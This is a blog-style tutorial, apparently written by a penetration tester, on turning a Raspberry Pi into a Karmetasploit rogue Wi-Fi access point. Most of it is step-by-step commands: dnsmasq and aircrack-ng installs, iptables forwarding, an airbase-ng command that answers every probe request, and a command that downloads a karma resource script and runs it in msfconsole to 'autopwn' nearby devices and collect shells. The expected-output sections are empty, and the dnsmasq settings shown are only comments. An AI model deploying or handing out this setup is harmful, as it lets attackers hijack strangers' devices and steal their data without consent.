For years, I’ve found that penetrating corporate environments through mobile devices is much easier than attacking border-edge firewalls and hardened servers. For this reason, I’ve begun using kits such as Karmetasploit. Leveraging a Raspberry Pi and Metasploit, allows for instant shells and pillaging of data. Using nothing more than a RaspberryPi, Alfa antenna and a internet connection.
Here is how you do it…
Install Raspbian on a Pi2 or greater. Once this has been done, apply all of the available updates.
sudo apt-get update && apt-get -y upgrade && apt-get -y install vim
Next, install dnsmasq. This will be used for DNS resolution and DHCP address handouts.
sudo apt-get -y install dnsmasq
Once it is installed, configure dnsmasq by performing the following:
Update it to include the following at the top:
# If you want dnsmasq to listen for DHCP and DNS requests only on
# specified interfaces (and the loopback) give the name of the
# interface (eg eth0) here.
# Repeat the line for more than one interface.
# Uncomment this to enable the integrated DHCP server, you need
# to supply the range of addresses available for lease and optionally
# a lease time. If you have more than one network, you will need to
# repeat this for each network on which you want to supply DHCP
Next, install Aircrack-ng by doing the following:
sudo apt-get -y install aircrack-ng
Once this is in place, you will need to create the proper rules to forward all “hooked” traffic. You can do this by issuing the following commands:
iptables -A FORWARD -i wlan0mon -j ACCEPT
iptables -A FORWARD -i at0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
Okay, time to start hooking devices…
Start airbase-ng in a mode that has a default SSID, but will also associate to all beacon requests. Issue the following command. It will also create a new interface named at0:
airbase-ng -P -C 30 -e “linksys” -v wlan0mon
If done properly, you will see something similar:
Open a second terminal window, issue the following to configure the interface on at0:
ifconfig at0 up 10.10.10.1 netmask 255.255.255.0
service dnsmasq restart
Finally, begin autopwning devices by issuing the following command:
cd /opt && wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt && msfconsole -q -r /opt/karma.rc_.txt
If done properly, you should see the following:
You can confirm this by connecting a test device to any previously accepted WiFi networks and opening a browser. It should reveal the following:
When successful, shells will be returned into the second console window that should be running Karmetasploit.